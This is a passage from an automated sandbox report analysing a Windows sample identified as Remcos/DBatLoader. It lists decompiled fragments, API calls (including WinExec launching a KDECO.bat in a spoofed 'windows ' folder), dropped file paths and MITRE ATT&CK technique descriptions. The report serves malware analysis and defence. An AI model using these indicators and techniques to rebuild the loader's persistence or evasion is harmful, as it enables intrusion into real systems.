					_t22 = _a12 + _a20;
					if(_t22 > _t43) {
						_v8 =  *((intOrPtr*)(_t43 + 4)) - 8 >> 1;
						_t45 = _v8 - 1;
						if(_t45 < 0) {
							L8:
							_t43 = _t36;
							_t36 = _t36 + 8;
							continue;
						}
						_t46 = _t45 + 1;
						do {
							if(IsBadReadPtr(_t36, 4) == 0 && ( *_t36 & 0x0000ffff ^ 0x00003000) < 0x1000) {
								_v16 = ( *_t36 & 0x0000ffff) % 0x3000 +  *_t43 + _a8;
								if(IsBadWritePtr(_v16, 4) == 0) {
									 *_v16 =  *_v16 + _v20;
								}
							}
							_t36 = _t36 + 2;
							_t46 = _t46 - 1;
						} while (_t46 != 0);
						goto L8;
					}
					break;
				}
				return _t22;
			}

0x02868119
0x02868122
0x02868128
0x02868190
0x02868193
0x0286819a
0x00000000
0x00000000
0x0286819f
0x028681a6
0x00000000
0x00000000
0x028681ab
0x028681b0
0x02868135
0x0286813b
0x0286813e
0x0286818b
0x0286818b
0x0286818d
0x00000000
0x0286818d
0x02868140
0x02868141
0x0286814b
0x0286816b
0x0286817b
0x02868183
0x02868183
0x0286817b
0x02868185
0x02868188
0x02868188
0x00000000
0x02868141
0x00000000
0x028681b0
0x028681bc

APIs

IsBadReadPtr.KERNEL32(?,00000004,?,00000004,?,00000008), ref: 02868144
IsBadWritePtr.KERNEL32(?,00000004,?,00000004,?,00000004,?,00000008), ref: 02868174
IsBadReadPtr.KERNEL32(?,00000008), ref: 02868193
IsBadReadPtr.KERNEL32(?,00000004,?,00000008), ref: 0286819F

Memory Dump Source

Source File: 00000000.00000002.554764034.0000000002851000.00000020.00001000.00020000.00000000.sdmp, Offset: 02850000, based on PE: true

Associated: 00000000.00000002.554751318.0000000002850000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.554840460.0000000002877000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.554933392.00000000028A6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.554948392.00000000028A7000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2850000_tTIYCp2sf4.jbxd

Similarity

API ID: Read$Write
String ID:
API String ID: 3448952669-0
Opcode ID: c5c57ebb1ccfdf97f91a838f5fe6b39f74773a0fe3b05516c2e2fcb04ee082ca
Instruction ID: d32ff50300fa1facb52569376031fbfc97312be6798013eafe91463b70919562
Opcode Fuzzy Hash: c5c57ebb1ccfdf97f91a838f5fe6b39f74773a0fe3b05516c2e2fcb04ee082ca
Instruction Fuzzy Hash: 2A21B4BDA40229ABDB50CF19CC85BBE73AAEF80360F044115EE18DB340E734E8118AA0

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: easinvoker.exePID: 6552, Parent PID: 6332COMMON

Execution Graph

Execution Coverage:	9.8%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	3.3%
Total number of Nodes:	122
Total number of Limit Nodes:	3

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 613C1446 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 11
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WinExec.KERNEL32(?,?,?,613C14A5), ref: 613C1461
ExitProcess.KERNEL32(?,?,?,613C14A5), ref: 613C146F

Strings

C:\windows \system32\KDECO.bat, xrefs: 613C1453

Memory Dump Source

Source File: 0000000B.00000002.546249650.00000000613C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 613C0000, based on PE: true

Associated: 0000000B.00000002.546237759.00000000613C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.546264583.00000000613C4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.546274327.00000000613C8000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.546285084.00000000613C9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.546299928.00000000613CD000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_613c0000_easinvoker.jbxd

Similarity

API ID: ExecExitProcess
String ID: C:\windows \system32\KDECO.bat
API String ID: 4112423671-3197246866
Opcode ID: b3456a760db7434f8d5867fb47a99551f6fd8c56f163cafdbc40650464793521
Instruction ID: 4c5d8cd5d910ffdc7edc5c81563eb71587e0c072eced2b6f5a338f6d84e390be
Opcode Fuzzy Hash: b3456a760db7434f8d5867fb47a99551f6fd8c56f163cafdbc40650464793521
Instruction Fuzzy Hash: 29D0123431192888FB00AB66FCA23D12322E794B40F5C0021C81E5B3B0CE2ACA228380

Uniqueness

Uniqueness Score: -1.00%

Function 613C1E10 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 67
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAddFunctionTable.KERNEL32 ref: 613C1EEA

Strings

.pdata, xrefs: 613C1E31

Memory Dump Source

Source File: 0000000B.00000002.546249650.00000000613C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 613C0000, based on PE: true

Associated: 0000000B.00000002.546237759.00000000613C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.546264583.00000000613C4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.546274327.00000000613C8000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.546285084.00000000613C9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.546299928.00000000613CD000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_613c0000_easinvoker.jbxd

Similarity

API ID: FunctionTable
String ID: .pdata
API String ID: 1252446317-4177594709
Opcode ID: 1a5f6c24201736e11f71e867ddcf66c4e02aca3fdeeedcbeef6722f7c10745f6
Instruction ID: 9b48684eaa54373ac2d77e7686239314a7b50e7976879dfb6e5eb98d9026d313
Opcode Fuzzy Hash: 1a5f6c24201736e11f71e867ddcf66c4e02aca3fdeeedcbeef6722f7c10745f6
Instruction Fuzzy Hash: 0621D272702164CAFB058F69D9443947BB2A789F9CF4CC020CE0E97304EB36CA51DB51

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 613C1B60 Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 50
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlCaptureContext.KERNEL32 ref: 613C1B74
RtlLookupFunctionEntry.KERNEL32 ref: 613C1B8B
RtlVirtualUnwind.KERNEL32 ref: 613C1BCD
SetUnhandledExceptionFilter.KERNEL32 ref: 613C1C14
UnhandledExceptionFilter.KERNEL32 ref: 613C1C21
GetCurrentProcess.KERNEL32 ref: 613C1C27
TerminateProcess.KERNEL32 ref: 613C1C35

Strings

@u<a, xrefs: 613C1C1A

Memory Dump Source

Source File: 0000000B.00000002.546249650.00000000613C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 613C0000, based on PE: true

Associated: 0000000B.00000002.546237759.00000000613C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.546264583.00000000613C4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.546274327.00000000613C8000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.546285084.00000000613C9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.546299928.00000000613CD000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_613c0000_easinvoker.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentEntryFunctionLookupTerminateUnwindVirtual
String ID: @u<a
API String ID: 3266983031-2704016811
Opcode ID: 3fe8edf890545a3c8ca01450929e34242cb447bf27343d606198e146d2ccdf0e
Instruction ID: f94ddf039621e221967baa8edb73e03f7702b5fa200f94eb725674a2b633c061
Opcode Fuzzy Hash: 3fe8edf890545a3c8ca01450929e34242cb447bf27343d606198e146d2ccdf0e
Instruction Fuzzy Hash: 0B21E375611B64C9EB008F62F8443C937B6BB48B98F495126DD8F27724EF3AC6248390

Uniqueness

Uniqueness Score: -1.00%

Function 613C1050 Relevance: 10.6, APIs: 2, Strings: 5, Instructions: 146
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32 ref: 613C1099

Strings

Hy<a, xrefs: 613C1077, 613C10F3
@y<a, xrefs: 613C10A8, 613C112F
Xy<a, xrefs: 613C11B8
PA<a, xrefs: 613C115E
Py<a, xrefs: 613C11A0

Memory Dump Source

Source File: 0000000B.00000002.546249650.00000000613C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 613C0000, based on PE: true

Associated: 0000000B.00000002.546237759.00000000613C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.546264583.00000000613C4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.546274327.00000000613C8000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.546285084.00000000613C9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.546299928.00000000613CD000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_613c0000_easinvoker.jbxd

Similarity

API ID: Sleep
String ID: @y<a$Hy<a$PA<a$Py<a$Xy<a
API String ID: 3472027048-4231909830
Opcode ID: 6a04c88ca713c1909bc590f0e4298c2beab8979a6fd2d427b8616973f60fcf11
Instruction ID: fa2c0e70f73d20439f9ad63a0ffe88be5d3e49048c325fff2c4482aeb8ecd435
Opcode Fuzzy Hash: 6a04c88ca713c1909bc590f0e4298c2beab8979a6fd2d427b8616973f60fcf11
Instruction Fuzzy Hash: A041C136702624C9F7029B5AE95039527B6A784FDCF48C022DE0E97354DF3ACD91D352

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF780559E54 Relevance: 9.0, APIs: 6, Instructions: 47
timethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00007FF77FF780559E54(long long __rbx, signed long long _a16, long long _a32) {

				_a32 = __rbx;
				_a16 = _a16 & 0x00000000;
			}

0x7ff780559e54
0x7ff780559e68

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 00007FF780559E84
GetCurrentProcessId.KERNEL32 ref: 00007FF780559E92
GetCurrentThreadId.KERNEL32 ref: 00007FF780559E9E
GetTickCount.KERNEL32 ref: 00007FF780559EAA
GetTickCount.KERNEL32 ref: 00007FF780559EBA
QueryPerformanceCounter.KERNEL32 ref: 00007FF780559ED5

Memory Dump Source

Source File: 0000000B.00000002.546849860.00007FF780541000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF780540000, based on PE: true

Associated: 0000000B.00000002.546835544.00007FF780540000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.546909039.00007FF78055C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.546921484.00007FF78055D000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff780540000_easinvoker.jbxd

Similarity

API ID: CountCurrentTickTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 4104442557-0
Opcode ID: a70ea0b59a2ae1b815e0bd9ab958c9e9749b377321f7a8ebfb09bb20146cbade
Instruction ID: b84cfc2dfe37cdf6a13a69064579befeba3fa8b15c1974f46ad156cd9d7d21a1
Opcode Fuzzy Hash: a70ea0b59a2ae1b815e0bd9ab958c9e9749b377321f7a8ebfb09bb20146cbade
Instruction Fuzzy Hash: 86113032604F418AEB10DF74E85956973A4FB0A758F941A31FA5D87BA4DF3CE2A4C360

Uniqueness

Uniqueness Score: -1.00%

Function 613C16C0 Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 210
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualQuery.KERNEL32(?,?,?,?,?,?,613C3014,?,?,?,?,613C12F5), ref: 613C1870
VirtualProtect.KERNEL32(?,?,?,?,?,?,613C3014,?,?,?,?,613C12F5), ref: 613C1892

Strings

Unknown pseudo relocation protocol version %d., xrefs: 613C19AC
Unknown pseudo relocation bit size %d., xrefs: 613C194B
VirtualQuery failed for %d bytes at address %p, xrefs: 613C1691, 613C1995

Memory Dump Source

Source File: 0000000B.00000002.546249650.00000000613C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 613C0000, based on PE: true

Associated: 0000000B.00000002.546237759.00000000613C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.546264583.00000000613C4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.546274327.00000000613C8000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.546285084.00000000613C9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.546299928.00000000613CD000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_613c0000_easinvoker.jbxd

Similarity

API ID: Virtual$ProtectQuery
String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.$ VirtualQuery failed for %d bytes at address %p
API String ID: 1027372294-974437099
Opcode ID: ac37564a0943cd9c4829d9f00c113f258bab8429c18220a49573c59559e13634
Instruction ID: d1b4ddb9884753ba9f060f2ad50529926f9c9f07c0d7013e73f46a45df094a5d
Opcode Fuzzy Hash: ac37564a0943cd9c4829d9f00c113f258bab8429c18220a49573c59559e13634
Instruction Fuzzy Hash: C471CD76B11A24C6EB01CB66E94078A7772B744FACF08C115CD1F27358DB3AC905E382

Uniqueness

Uniqueness Score: -1.00%

Function 613C1A80 Relevance: 7.6, APIs: 5, Instructions: 57
timethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 613C1AC5
GetCurrentProcessId.KERNEL32 ref: 613C1AD0
GetCurrentThreadId.KERNEL32 ref: 613C1AD8
GetTickCount.KERNEL32 ref: 613C1AE0
QueryPerformanceCounter.KERNEL32 ref: 613C1AED

Memory Dump Source

Source File: 0000000B.00000002.546249650.00000000613C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 613C0000, based on PE: true

Associated: 0000000B.00000002.546237759.00000000613C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.546264583.00000000613C4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.546274327.00000000613C8000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.546285084.00000000613C9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.546299928.00000000613CD000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_613c0000_easinvoker.jbxd

Similarity

API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
String ID:
API String ID: 1445889803-0
Opcode ID: 2ea03832c0dc0cb9eba84dc4ab77c4331fcba75045809e3b0057f4675091efb6
Instruction ID: 414e8fcb770a865792631034dca2ba3ece076a107bf7b4a66efec48a9980259e
Opcode Fuzzy Hash: 2ea03832c0dc0cb9eba84dc4ab77c4331fcba75045809e3b0057f4675091efb6
Instruction Fuzzy Hash: DE11B233712A6082FB109B25F808385B261B788BE4F0C4235DD5F13BA4DA3DCA958340

Uniqueness

Uniqueness Score: -1.00%

Function 613C1550 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualQuery.KERNEL32 ref: 613C1606

Strings

VirtualQuery failed for %d bytes at address %p, xrefs: 613C1691
Address %p has no image-section, xrefs: 613C1557, 613C16A2

Memory Dump Source

Source File: 0000000B.00000002.546249650.00000000613C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 613C0000, based on PE: true

Associated: 0000000B.00000002.546237759.00000000613C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.546264583.00000000613C4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.546274327.00000000613C8000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.546285084.00000000613C9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.546299928.00000000613CD000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_613c0000_easinvoker.jbxd

Similarity

API ID: QueryVirtual
String ID: VirtualQuery failed for %d bytes at address %p$Address %p has no image-section
API String ID: 1804819252-157664173
Opcode ID: ceb095db029ccd83e1a4bc7a7c806a4770a528e67f66955d3a5e886fd59690f7
Instruction ID: 1549435389f1d83eb98944755ae3b0791324c1eeac1aff2d4bd9f122e5cf5d3c
Opcode Fuzzy Hash: ceb095db029ccd83e1a4bc7a7c806a4770a528e67f66955d3a5e886fd59690f7
Instruction Fuzzy Hash: BD31EF77701A64D5EA119F16EC00B957B76B788FE8F0C8125EE1E17350DB39CA52C780

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access and remote desktop. Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	AWS CloudTrail logs, Authentication logs, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse shared modules to execute malicious payloads. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Native API which is called from functions like `CreateProcess` , `LoadLibrary` , etc. of the Win32 API.
Tactics:	Execution
Data Sources:	API monitoring, DLL monitoring, File monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	DLL monitoring, File monitoring, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.Unlike Keylogging , this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Loaded DLLs, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report tTIYCp2sf4.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Remcos

Threatname: DBatLoader

Yara Signatures

Initial Sample

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

Stealing of Sensitive Information

Snort Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Exploits

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\gfdghfhjf\logs.dat

C:\Users\Public\Gjwyghlf.url

C:\Users\Public\Libraries\Gjwyghlf.PIF

C:\Users\Public\Libraries\GjwyghlfO.bat

C:\Users\Public\Libraries\KDECO.bat

C:\Users\Public\Libraries\Null

Windows Analysis Report
tTIYCp2sf4.exe

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

